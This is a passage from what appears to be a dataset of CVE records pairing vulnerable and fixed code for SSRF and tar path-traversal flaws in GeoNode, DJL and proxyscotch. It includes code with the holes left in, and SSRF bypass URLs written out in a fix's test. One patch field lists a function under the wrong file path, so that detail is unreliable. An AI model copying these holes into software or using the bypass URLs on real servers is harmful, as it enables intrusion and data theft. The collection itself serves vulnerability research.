prog_name=prog_name),\n help='log file pathname')\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-40017", "cve_description": "GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. In versions 3.2.0 through 4.1.2, the endpoint `/proxy/?url=` does not properly protect against server-side request forgery. This allows an attacker to port scan internal hosts and request information from internal hosts. 
A patch is available at commit a9eebae80cb362009660a1fd49e105e7cdb499b9.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/GeoNode/geonode", "patch_url": ["https://github.com/GeoNode/geonode/commit/a9eebae80cb362009660a1fd49e105e7cdb499b9"], "programing_language": "Python", "vul_func": [{"id": "vul_py_160_1", "commit": "618776e", "file_path": "geonode/proxy/tests.py", "start_line": 63, "end_line": 261, "snippet": " self.maxDiff = None\n self.admin = get_user_model().objects.get(username=\"admin\")\n\n # FIXME(Ariel): These tests do not work when the computer is offline.\n self.proxy_url = \"/proxy/\"\n self.url = TEST_URL\n\n @override_settings(DEBUG=True, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is True, all hosts pass the proxy.\"\"\"\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertTrue(response.status_code in (200, 301), response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_not_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is False requests should return 403.\"\"\"\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertEqual(response.status_code, 403, response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=(TEST_DOMAIN,))\n def test_proxy_allowed_host(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is not empty and DEBUG is False requests should return no error.\"\"\"\n self.client.login(username=\"admin\", password=\"admin\")\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertEqual(response.status_code, 200, response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=())\n def test_validate_remote_services_hosts(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is False requests should return 200\n for Remote Services hosts.\"\"\"\n from geonode.services.models import Service\n from geonode.services.enumerations import WMS, INDEXED\n\n Service.objects.get_or_create(\n type=WMS,\n name=\"Bogus\",\n title=\"Pocus\",\n owner=self.admin,\n method=INDEXED,\n base_url=\"http://bogus.pocus.com/ows\",\n )\n response = self.client.get(f\"{self.proxy_url}?url=http://bogus.pocus.com/ows/wms?request=GetCapabilities\")\n # 200 - FOUND\n self.assertTrue(response.status_code in (200, 301))\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=(\".example.org\",))\n def test_relative_urls(self):\n \"\"\"Proxying to a URL with a relative path element should normalise the path into\n an absolute path before calling the remote URL.\"\"\"\n import geonode.proxy.views\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = {\"Content-Type\": \"text/html\"}\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n geonode.proxy.views.http_client.request = request_mock\n url = \"http://example.org/test/test/../../index.html\"\n\n self.client.get(f\"{self.proxy_url}?url={url}\")\n assert request_mock.call_args[0][0] == 
\"http://example.org/index.html\"\n\n def test_proxy_preserve_headers(self):\n \"\"\"The GeoNode Proxy should preserve the original request headers.\"\"\"\n import geonode.proxy.views\n\n _test_headers = {\n \"Access-Control-Allow-Credentials\": False,\n \"Access-Control-Allow-Headers\": \"Content-Type, Accept, Authorization, Origin, User-Agent\",\n \"Access-Control-Allow-Methods\": \"GET, POST, PUT, PATCH, OPTIONS\",\n \"Cache-Control\": \"public, must-revalidate, max-age = 30\",\n \"Connection\": \"keep-alive\",\n \"Content-Language\": \"en\",\n \"Content-Length\": 116559,\n \"Content-Type\": \"image/tiff\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n \"Date\": \"Fri, 05 Nov 2021 17: 19: 11 GMT\",\n \"Server\": \"nginx/1.17.2\",\n \"Set-Cookie\": \"sessionid = bogus-pocus; HttpOnly; Path=/; SameSite=Lax\",\n \"Strict-Transport-Security\": \"max-age=3600; includeSubDomains\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n }\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = _test_headers\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n geonode.proxy.views.http_client.request = request_mock\n url = \"http://example.org/test/test/../../image.tiff\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertDictContainsSubset(\n dict(response.headers.copy()),\n {\n \"Content-Type\": \"text/plain\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n \"Referrer-Policy\": \"same-origin\",\n \"X-Frame-Options\": \"SAMEORIGIN\",\n \"Content-Language\": \"en-us\",\n \"Content-Length\": \"119\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n },\n )\n\n\nclass DownloadResourceTestCase(GeoNodeBaseTestSupport):\n def setUp(self):\n super().setUp()\n self.maxDiff = None\n create_models(type=\"dataset\")\n\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_url_with_not_existing_file(self):\n dataset = Dataset.objects.all().first()\n self.client.login(username=\"admin\", password=\"admin\")\n # ... all should be good\n response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n # Espected 404 since there are no files available for this layer\n self.assertEqual(response.status_code, 404)\n content = response.content\n if isinstance(content, bytes):\n content = content.decode(\"UTF-8\")\n data = content\n self.assertTrue(\"No files have been found for this resource. Please, contact a system administrator.\" in data)\n\n @patch(\"geonode.storage.manager.storage_manager.exists\")\n @patch(\"geonode.storage.manager.storage_manager.open\")\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_url_with_existing_files(self, fopen, fexists):\n fexists.return_value = True\n fopen.return_value = SimpleUploadedFile(\"foo_file.shp\", b\"scc\")\n dataset = Dataset.objects.all().first()\n\n dataset.files = [\n \"/tmpe1exb9e9/foo_file.dbf\",\n \"/tmpe1exb9e9/foo_file.prj\",\n \"/tmpe1exb9e9/foo_file.shp\",\n \"/tmpe1exb9e9/foo_file.shx\",\n ]\n\n dataset.save()\n\n dataset.refresh_from_db()\n\n upload = Upload.objects.create(state=\"RUNNING\", resource=dataset)\n\n assert upload\n\n self.client.login(username=\"admin\", password=\"admin\")\n # ... 
all should be good\n response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n # Espected 404 since there are no files available for this layer\n self.assertEqual(response.status_code, 200)\n self.assertEqual(\"application/zip\", response.headers.get(\"Content-Type\"))\n self.assertEqual('attachment; filename=\"CA.zip\"', response.headers.get(\"Content-Disposition\"))\n\n @patch(\"geonode.storage.manager.storage_manager.exists\")\n @patch(\"geonode.storage.manager.storage_manager.open\")\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_files(self, fopen, fexists):\n fexists.return_value = True\n fopen.return_value = SimpleUploadedFile(\"foo_file.shp\", b\"scc\")\n dataset = Dataset.objects.all().first()\n\n dataset.files = [\n \"/tmpe1exb9e9/foo_file.dbf\",\n \"/tmpe1exb9e9/foo_file.prj\",\n \"/tmpe1exb9e9/foo_file.shp\",\n \"/tmpe1exb9e9/foo_file.shx\",\n ]\n\n dataset.save()\n\n dataset.refresh_from_db()\n\n Upload.objects.create(state=\"COMPLETE\", resource=dataset)\n\n self.client.login(username=\"admin\", password=\"admin\")\n response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n # headers and status assertions\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.get(\"content-type\"), \"application/zip\")\n self.assertEqual(response.get(\"content-disposition\"), f'attachment; filename=\"{dataset.name}.zip\"')\n # Inspect content\n zip_content = io.BytesIO(b\"\".join(response.streaming_content))"}], "fix_func": [{"id": "fix_py_160_1", "commit": "a9eebae", "file_path": "geonode/proxy/tests.py", "start_line": 70, "end_line": 268, "snippet": " @override_settings(DEBUG=True, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is True, all hosts pass the proxy.\"\"\"\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertTrue(response.status_code in (200, 301), response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_not_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is False requests should return 403.\"\"\"\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertEqual(response.status_code, 403, response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=(TEST_DOMAIN,))\n def test_proxy_allowed_host(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is not empty and DEBUG is False requests should return no error.\"\"\"\n self.client.login(username=\"admin\", password=\"admin\")\n response = self.client.get(f\"{self.proxy_url}?url={self.url}\")\n if response.status_code != 404: # 404 - NOT FOUND\n self.assertEqual(response.status_code, 200, response.status_code)\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=())\n def test_validate_remote_services_hosts(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is False requests should return 200\n for Remote Services hosts.\"\"\"\n from geonode.services.models import Service\n from geonode.services.enumerations import WMS, INDEXED\n\n Service.objects.get_or_create(\n type=WMS,\n name=\"Bogus\",\n title=\"Pocus\",\n owner=self.admin,\n method=INDEXED,\n base_url=\"http://bogus.pocus.com/ows\",\n )\n response = self.client.get(f\"{self.proxy_url}?url=http://bogus.pocus.com/ows/wms?request=GetCapabilities\")\n # 200 - FOUND\n self.assertTrue(response.status_code in 
(200, 301))\n\n @override_settings(DEBUG=False, PROXY_ALLOWED_HOSTS=(\".example.org\",))\n def test_relative_urls(self):\n \"\"\"Proxying to a URL with a relative path element should normalise the path into\n an absolute path before calling the remote URL.\"\"\"\n import geonode.proxy.views\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = {\"Content-Type\": \"text/html\"}\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n geonode.proxy.views.http_client.request = request_mock\n url = \"http://example.org/test/test/../../index.html\"\n\n self.client.get(f\"{self.proxy_url}?url={url}\")\n assert request_mock.call_args[0][0] == \"http://example.org/index.html\"\n\n def test_proxy_preserve_headers(self):\n \"\"\"The GeoNode Proxy should preserve the original request headers.\"\"\"\n import geonode.proxy.views\n\n _test_headers = {\n \"Access-Control-Allow-Credentials\": False,\n \"Access-Control-Allow-Headers\": \"Content-Type, Accept, Authorization, Origin, User-Agent\",\n \"Access-Control-Allow-Methods\": \"GET, POST, PUT, PATCH, OPTIONS\",\n \"Cache-Control\": \"public, must-revalidate, max-age = 30\",\n \"Connection\": \"keep-alive\",\n \"Content-Language\": \"en\",\n \"Content-Length\": 116559,\n \"Content-Type\": \"image/tiff\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n \"Date\": \"Fri, 05 Nov 2021 17: 19: 11 GMT\",\n \"Server\": \"nginx/1.17.2\",\n \"Set-Cookie\": \"sessionid = bogus-pocus; HttpOnly; Path=/; SameSite=Lax\",\n \"Strict-Transport-Security\": \"max-age=3600; includeSubDomains\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n }\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = _test_headers\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n geonode.proxy.views.http_client.request = request_mock\n url = \"http://example.org/test/test/../../image.tiff\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertDictContainsSubset(\n dict(response.headers.copy()),\n {\n \"Content-Type\": \"text/plain\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n \"Referrer-Policy\": \"same-origin\",\n \"X-Frame-Options\": \"SAMEORIGIN\",\n \"Content-Language\": \"en-us\",\n \"Content-Length\": \"119\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n },\n )\n\n def test_proxy_url_forgery(self):\n \"\"\"The GeoNode Proxy should preserve the original request headers.\"\"\"\n import geonode.proxy.views\n from urllib.parse import urlsplit\n\n class Response:\n status_code = 200\n content = \"Hello World\"\n headers = {\n \"Content-Type\": \"text/plain\",\n \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n \"X-Content-Type-Options\": \"nosniff\",\n \"X-XSS-Protection\": \"1; mode=block\",\n \"Referrer-Policy\": \"same-origin\",\n \"X-Frame-Options\": \"SAMEORIGIN\",\n \"Content-Language\": \"en-us\",\n \"Content-Length\": \"119\",\n \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n }\n\n request_mock = MagicMock()\n request_mock.return_value = (Response(), None)\n\n # Non-Legit requests attempting SSRF\n geonode.proxy.views.http_client.request = request_mock\n url = f\"http://example.org\\@%23{urlsplit(settings.SITEURL).hostname}\"\n\n response = 
self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertEqual(response.status_code, 403)\n\n url = f\"http://125.126.127.128\\@%23{urlsplit(settings.SITEURL).hostname}\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertEqual(response.status_code, 403)\n\n # Legit requests using the local host (SITEURL)\n url = f\"/\\@%23{urlsplit(settings.SITEURL).hostname}\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertEqual(response.status_code, 200)\n\n url = f\"{settings.SITEURL}\\@%23{urlsplit(settings.SITEURL).hostname}\"\n\n response = self.client.get(f\"{self.proxy_url}?url={url}\")\n self.assertEqual(response.status_code, 200)\n\n\nclass DownloadResourceTestCase(GeoNodeBaseTestSupport):\n def setUp(self):\n super().setUp()\n self.maxDiff = None\n create_models(type=\"dataset\")\n\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_url_with_not_existing_file(self):\n dataset = Dataset.objects.all().first()\n self.client.login(username=\"admin\", password=\"admin\")\n # ... all should be good\n response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n # Espected 404 since there are no files available for this layer\n self.assertEqual(response.status_code, 404)\n content = response.content\n if isinstance(content, bytes):\n content = content.decode(\"UTF-8\")\n data = content\n self.assertTrue(\"No files have been found for this resource. Please, contact a system administrator.\" in data)\n\n @patch(\"geonode.storage.manager.storage_manager.exists\")\n @patch(\"geonode.storage.manager.storage_manager.open\")\n @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n def test_download_url_with_existing_files(self, fopen, fexists):\n fexists.return_value = True\n fopen.return_value = SimpleUploadedFile(\"foo_file.shp\", b\"scc\")\n dataset = Dataset.objects.all().first()\n\n dataset.files = [\n \"/tmpe1exb9e9/foo_file.dbf\",\n \"/tmpe1exb9e9/foo_file.prj\",\n \"/tmpe1exb9e9/foo_file.shp\",\n \"/tmpe1exb9e9/foo_file.shx\",\n ]\n\n dataset.save()\n\n dataset.refresh_from_db()\n\n upload = Upload.objects.create(state=\"RUNNING\", resource=dataset)\n"}, {"id": "fix_py_160_2", "commit": "a9eebae", "file_path": "geonode/utils.py", "start_line": 1934, "end_line": 1953, "snippet": "def extract_ip_or_domain(url):\n ip_regex = re.compile(\"^(?:http\\:\\/\\/|https\\:\\/\\/)(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\")\n domain_regex = re.compile(\"^(?:http\\:\\/\\/|https\\:\\/\\/)([a-zA-Z0-9.-]+)\")\n\n match = ip_regex.findall(url)\n if len(match):\n ip_address = match[0]\n try:\n ipaddress.ip_address(ip_address) # Validate the IP address\n return ip_address\n except ValueError:\n pass\n\n match = domain_regex.findall(url)\n if len(match):\n return match[0]\n\n return None\n\n"}], "vul_patch": "--- a/geonode/proxy/tests.py\n+++ b/geonode/proxy/tests.py\n@@ -1,10 +1,3 @@\n- self.maxDiff = None\n- self.admin = get_user_model().objects.get(username=\"admin\")\n-\n- # FIXME(Ariel): These tests do not work when the computer is offline.\n- self.proxy_url = \"/proxy/\"\n- self.url = TEST_URL\n-\n @override_settings(DEBUG=True, PROXY_ALLOWED_HOSTS=())\n def test_validate_host_disabled_in_debug(self):\n \"\"\"If PROXY_ALLOWED_HOSTS is empty and DEBUG is True, all hosts pass the proxy.\"\"\"\n@@ -116,6 +109,52 @@\n },\n )\n \n+ def test_proxy_url_forgery(self):\n+ \"\"\"The GeoNode Proxy should preserve the original request headers.\"\"\"\n+ import geonode.proxy.views\n+ from urllib.parse import urlsplit\n+\n+ class Response:\n+ status_code 
= 200\n+ content = \"Hello World\"\n+ headers = {\n+ \"Content-Type\": \"text/plain\",\n+ \"Vary\": \"Authorization, Accept-Language, Cookie, origin\",\n+ \"X-Content-Type-Options\": \"nosniff\",\n+ \"X-XSS-Protection\": \"1; mode=block\",\n+ \"Referrer-Policy\": \"same-origin\",\n+ \"X-Frame-Options\": \"SAMEORIGIN\",\n+ \"Content-Language\": \"en-us\",\n+ \"Content-Length\": \"119\",\n+ \"Content-Disposition\": 'attachment; filename=\"filename.tif\"',\n+ }\n+\n+ request_mock = MagicMock()\n+ request_mock.return_value = (Response(), None)\n+\n+ # Non-Legit requests attempting SSRF\n+ geonode.proxy.views.http_client.request = request_mock\n+ url = f\"http://example.org\\@%23{urlsplit(settings.SITEURL).hostname}\"\n+\n+ response = self.client.get(f\"{self.proxy_url}?url={url}\")\n+ self.assertEqual(response.status_code, 403)\n+\n+ url = f\"http://125.126.127.128\\@%23{urlsplit(settings.SITEURL).hostname}\"\n+\n+ response = self.client.get(f\"{self.proxy_url}?url={url}\")\n+ self.assertEqual(response.status_code, 403)\n+\n+ # Legit requests using the local host (SITEURL)\n+ url = f\"/\\@%23{urlsplit(settings.SITEURL).hostname}\"\n+\n+ response = self.client.get(f\"{self.proxy_url}?url={url}\")\n+ self.assertEqual(response.status_code, 200)\n+\n+ url = f\"{settings.SITEURL}\\@%23{urlsplit(settings.SITEURL).hostname}\"\n+\n+ response = self.client.get(f\"{self.proxy_url}?url={url}\")\n+ self.assertEqual(response.status_code, 200)\n+\n \n class DownloadResourceTestCase(GeoNodeBaseTestSupport):\n def setUp(self):\n@@ -157,43 +196,3 @@\n dataset.refresh_from_db()\n \n upload = Upload.objects.create(state=\"RUNNING\", resource=dataset)\n-\n- assert upload\n-\n- self.client.login(username=\"admin\", password=\"admin\")\n- # ... all should be good\n- response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n- # Espected 404 since there are no files available for this layer\n- self.assertEqual(response.status_code, 200)\n- self.assertEqual(\"application/zip\", response.headers.get(\"Content-Type\"))\n- self.assertEqual('attachment; filename=\"CA.zip\"', response.headers.get(\"Content-Disposition\"))\n-\n- @patch(\"geonode.storage.manager.storage_manager.exists\")\n- @patch(\"geonode.storage.manager.storage_manager.open\")\n- @on_ogc_backend(geoserver.BACKEND_PACKAGE)\n- def test_download_files(self, fopen, fexists):\n- fexists.return_value = True\n- fopen.return_value = SimpleUploadedFile(\"foo_file.shp\", b\"scc\")\n- dataset = Dataset.objects.all().first()\n-\n- dataset.files = [\n- \"/tmpe1exb9e9/foo_file.dbf\",\n- \"/tmpe1exb9e9/foo_file.prj\",\n- \"/tmpe1exb9e9/foo_file.shp\",\n- \"/tmpe1exb9e9/foo_file.shx\",\n- ]\n-\n- dataset.save()\n-\n- dataset.refresh_from_db()\n-\n- Upload.objects.create(state=\"COMPLETE\", resource=dataset)\n-\n- self.client.login(username=\"admin\", password=\"admin\")\n- response = self.client.get(reverse(\"download\", args=(dataset.id,)))\n- # headers and status assertions\n- self.assertEqual(response.status_code, 200)\n- self.assertEqual(response.get(\"content-type\"), \"application/zip\")\n- self.assertEqual(response.get(\"content-disposition\"), f'attachment; filename=\"{dataset.name}.zip\"')\n- # Inspect content\n- zip_content = io.BytesIO(b\"\".join(response.streaming_content))\n\n--- /dev/null\n+++ b/geonode/proxy/tests.py\n@@ -0,0 +1,19 @@\n+def extract_ip_or_domain(url):\n+ ip_regex = re.compile(\"^(?:http\\:\\/\\/|https\\:\\/\\/)(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\")\n+ domain_regex = 
re.compile(\"^(?:http\\:\\/\\/|https\\:\\/\\/)([a-zA-Z0-9.-]+)\")\n+\n+ match = ip_regex.findall(url)\n+ if len(match):\n+ ip_address = match[0]\n+ try:\n+ ipaddress.ip_address(ip_address) # Validate the IP address\n+ return ip_address\n+ except ValueError:\n+ pass\n+\n+ match = domain_regex.findall(url)\n+ if len(match):\n+ return match[0]\n+\n+ return None\n+\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-2914", "cve_description": "A TarSlip vulnerability exists in the deepjavalibrary/djl, affecting version 0.26.0 and fixed in version 0.27.0. This vulnerability allows an attacker to manipulate file paths within tar archives to overwrite arbitrary files on the target system. Exploitation of this vulnerability could lead to remote code execution, privilege escalation, data theft or manipulation, and denial of service. The vulnerability is due to improper validation of file paths during the extraction of tar files, as demonstrated in multiple occurrences within the library's codebase, including but not limited to the files_util.py and extract_imagenet.py scripts.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/deepjavalibrary/djl", "patch_url": ["https://github.com/deepjavalibrary/djl/commit/5235be508cec9e8cb6f496a4ed2fa40e4f62c370"], "programing_language": "Python", "vul_func": [{"id": "vul_py_328_1", "commit": "64c1b96", "file_path": "extensions/spark/setup/djl_spark/util/files_util.py", "start_line": 67, "end_line": 86, "snippet": "def download_and_extract(url, path):\n \"\"\"Download and extract a tar file.\n\n :param url: The url of the tar file.\n :param path: The path to the file to download to.\n \"\"\"\n if not os.path.exists(path):\n os.makedirs(path)\n if not os.listdir(path):\n with tmpdir() as tmp:\n tmp_file = os.path.join(tmp, \"tar_file\")\n if url.startswith(\"s3://\"):\n s3_download(url, tmp_file)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n t.extractall(path=path)\n elif url.startswith(\"http://\") or url.startswith(\"https://\"):\n with urlopen(url) as response, open(tmp_file, 'wb') as f:\n shutil.copyfileobj(response, f)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n t.extractall(path=path)"}], "fix_func": [{"id": "fix_py_328_1", "commit": "5235be508cec9e8cb6f496a4ed2fa40e4f62c370", "file_path": "extensions/spark/setup/djl_spark/util/files_util.py", "start_line": 67, "end_line": 100, "snippet": "def download_and_extract(url, path):\n \"\"\"Download and extract a tar file.\n\n :param url: The url of the tar file.\n :param path: The path to the file to download to.\n \"\"\"\n def is_within_directory(directory, target):\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonprefix([abs_directory, abs_target])\n return prefix == abs_directory\n\n def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n for member in tar.getmembers():\n member_path = os.path.join(path, member.name)\n if not is_within_directory(path, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n\n 
tar.extractall(path, members, numeric_owner=numeric_owner)\n\n if not os.path.exists(path):\n os.makedirs(path)\n if not os.listdir(path):\n with tmpdir() as tmp:\n tmp_file = os.path.join(tmp, \"tar_file\")\n if url.startswith(\"s3://\"):\n s3_download(url, tmp_file)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n safe_extract(t, path=path)\n elif url.startswith(\"http://\") or url.startswith(\"https://\"):\n with urlopen(url) as response, open(tmp_file, 'wb') as f:\n shutil.copyfileobj(response, f)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n safe_extract(t, path=path)"}], "vul_patch": "--- a/extensions/spark/setup/djl_spark/util/files_util.py\n+++ b/extensions/spark/setup/djl_spark/util/files_util.py\n@@ -4,6 +4,20 @@\n :param url: The url of the tar file.\n :param path: The path to the file to download to.\n \"\"\"\n+ def is_within_directory(directory, target):\n+ abs_directory = os.path.abspath(directory)\n+ abs_target = os.path.abspath(target)\n+ prefix = os.path.commonprefix([abs_directory, abs_target])\n+ return prefix == abs_directory\n+\n+ def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n+ for member in tar.getmembers():\n+ member_path = os.path.join(path, member.name)\n+ if not is_within_directory(path, member_path):\n+ raise Exception(\"Attempted Path Traversal in Tar File\")\n+\n+ tar.extractall(path, members, numeric_owner=numeric_owner)\n+\n if not os.path.exists(path):\n os.makedirs(path)\n if not os.listdir(path):\n@@ -12,9 +26,9 @@\n if url.startswith(\"s3://\"):\n s3_download(url, tmp_file)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n- t.extractall(path=path)\n+ safe_extract(t, path=path)\n elif url.startswith(\"http://\") or url.startswith(\"https://\"):\n with urlopen(url) as response, open(tmp_file, 'wb') as f:\n shutil.copyfileobj(response, f)\n with tarfile.open(name=tmp_file, mode=\"r:gz\") as t:\n- t.extractall(path=path)\n+ safe_extract(t, path=path)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-25850", "cve_description": "The package github.com/hoppscotch/proxyscotch before 1.0.0 is vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. It occurs when an HTTP request is made by a backend server to an untrusted URL submitted by a user. 
It leads to a leakage of sensitive information from the server.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/hoppscotch/proxyscotch", "patch_url": ["https://github.com/hoppscotch/proxyscotch/commit/de67380f62f907f201d75854b76024ba4885fab7"], "programing_language": "Go", "vul_func": [{"id": "vul_go_240_1", "commit": "f319207", "file_path": "libproxy/proxy.go", "start_line": 22, "end_line": 27, "snippet": "var (\n\taccessToken string\n\tsessionFingerprint string\n\tallowedOrigins []string\n\tbannedOutputs []string\n)"}, {"id": "vul_go_240_2", "commit": "f319207", "file_path": "libproxy/proxy.go", "start_line": 66, "end_line": 117, "snippet": "func Initialize(\n\tinitialAccessToken string,\n\tproxyURL string,\n\tinitialAllowedOrigins string,\n\tinitialBannedOutputs string,\n\tonStatusChange statusChangeFunction,\n\twithSSL bool,\n\tfinished chan bool,\n) {\n\tif initialBannedOutputs != \"\" {\n\t\tbannedOutputs = strings.Split(initialBannedOutputs, \",\")\n\t}\n\tallowedOrigins = strings.Split(initialAllowedOrigins, \",\")\n\taccessToken = initialAccessToken\n\tsessionFingerprint = uuid.New().String()\n\tlog.Println(\"Starting proxy server...\")\n\n\thttp.HandleFunc(\"/\", proxyHandler)\n\n\tif !withSSL {\n\t\tgo func() {\n\t\t\thttpServerError := http.ListenAndServe(proxyURL, nil)\n\n\t\t\tif httpServerError != nil {\n\t\t\t\tonStatusChange(\"An error occurred: \"+httpServerError.Error(), false)\n\t\t\t}\n\n\t\t\tfinished <- true\n\t\t}()\n\n\t\tonStatusChange(\"Listening on http://\"+proxyURL+\"/\", true)\n\t} else {\n\t\tonStatusChange(\"Checking SSL certificate...\", false)\n\n\t\terr := EnsurePrivateKeyInstalled()\n\t\tif err != nil {\n\t\t\tlog.Println(err.Error())\n\t\t\tonStatusChange(\"An error occurred.\", false)\n\t\t}\n\n\t\tgo func() {\n\t\t\thttpServerError := http.ListenAndServeTLS(proxyURL, GetOrCreateDataPath()+\"/cert.pem\", GetOrCreateDataPath()+\"/key.pem\", nil)\n\n\t\t\tif httpServerError != nil {\n\t\t\t\tonStatusChange(\"An error occurred.\", false)\n\t\t\t}\n\t\t}()\n\n\t\tonStatusChange(\"Listening on https://\"+proxyURL+\"/\", true)\n\t\tlog.Println(\"Proxy server listening on https://\" + proxyURL + \"/\")\n\t}\n}"}, {"id": "vul_go_240_3", "commit": "f319207", "file_path": "libproxy/proxy.go", "start_line": 131, "end_line": 326, "snippet": "func proxyHandler(response http.ResponseWriter, request *http.Request) {\n\t// We want to allow all types of requests to the proxy, though we only want to allow certain\n\t// origins.\n\tresponse.Header().Add(\"Access-Control-Allow-Headers\", \"*\")\n\tif request.Method == \"OPTIONS\" {\n\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\t\tresponse.WriteHeader(200)\n\t\treturn\n\t}\n\n\tif request.Header.Get(\"Origin\") == \"\" || !isAllowedOrigin(request.Header.Get(\"Origin\")) {\n\t\tif strings.HasPrefix(request.Header.Get(\"Content-Type\"), \"application/json\") {\n\t\t\tresponse.Header().Add(\"Access-Control-Allow-Headers\", \"*\")\n\t\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\t\t\tresponse.WriteHeader(200)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\t\treturn\n\t\t}\n\n\t\t// If it is not an allowed origin, redirect back to 
